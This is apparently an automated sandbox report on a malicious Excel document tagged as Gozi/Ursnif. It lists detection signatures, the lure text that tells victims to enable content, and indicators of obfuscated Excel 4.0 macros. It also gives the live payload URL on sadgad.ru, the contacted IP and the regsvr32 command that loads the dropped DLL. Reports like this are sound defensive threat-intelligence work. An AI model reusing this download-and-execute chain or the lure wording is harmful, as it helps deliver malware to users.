Analysis Report document-1458063504.xls

Overview

General Information

Sample Name: document-1458063504.xls
Analysis ID: 324315
MD5: 81094e0ac247fac6db3dea774c51d885
SHA1: 7fea7786c0b5ae000d81eb03fa1ca1587a9b878d
SHA256: dfbac751a1f71e4e4c92e9c88fdfd531ce6eec06e078046cf025cd0f049487bd
Tags: goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: document-1458063504.xls ReversingLabs: Detection: 44%

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: sadgad.ru
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 78.110.50.130:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 78.110.50.130:80

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 78.110.50.130 78.110.50.130
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadgad.ruConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ Jump to behavior
Source: global traffic HTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadgad.ruConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: sadgad.ru
Source: document-1458063504.xls String found in binary or memory: http://sadgad.ru/ds/231120.gif
Source: regsvr32.exe, 00000003.00000002.2092732865.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
Source: Screenshot number: 4 Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
Source: Screenshot number: 8 Screenshot OCR: Enable Content X I J15 " "," jR " A B C D E F G H I K L M N O P Q R S T Y 301 302 303 304
Found Excel 4.0 Macro with suspicious formulas
Source: document-1458063504.xls Initial sample: CALL
Source: document-1458063504.xls Initial sample: CALL
Source: document-1458063504.xls Initial sample: CALL
Source: document-1458063504.xls Initial sample: CALL
Source: document-1458063504.xls Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: document-1458063504.xls Initial sample: High usage of CHAR() function: 18
Document contains embedded VBA macros
Source: document-1458063504.xls OLE indicator, VBA macros: true
Yara signature match
Source: document-1458063504.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: classification engine Classification label: mal80.expl.evad.winXLS@3/5@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\3CDE0000 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD25B.tmp Jump to behavior
Source: document-1458063504.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: document-1458063504.xls ReversingLabs: Detection: 44%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Registers a DLL
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: document-1458063504.xls, type: SAMPLE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 324315 Sample: document-1458063504.xls Startdate: 29/11/2020 Architecture: WINDOWS Score: 80 14 Multi AV Scanner detection for submitted file 2->14 16 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->16 18 Sigma detected: Microsoft Office Product Spawning Windows Shell 2->18 20 3 other signatures 2->20 6 EXCEL.EXE 87 42 2->6         started        process3 dnsIp4 12 sadgad.ru 78.110.50.130, 49165, 80 HT-SYSTEMS-ASUplinksRU Russian Federation 6->12 22 Document exploit detected (process start blacklist hit) 6->22 24 Document exploit detected (UrlDownloadToFile) 6->24 10 regsvr32.exe 6->10         started        signatures5 process6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
78.110.50.130
 unknown Russian Federation
31240 HT-SYSTEMS-ASUplinksRU false

Contacted Domains

Name IP Active
sadgad.ru 78.110.50.130 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://sadgad.ru/ds/231120.gif false
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
 unknown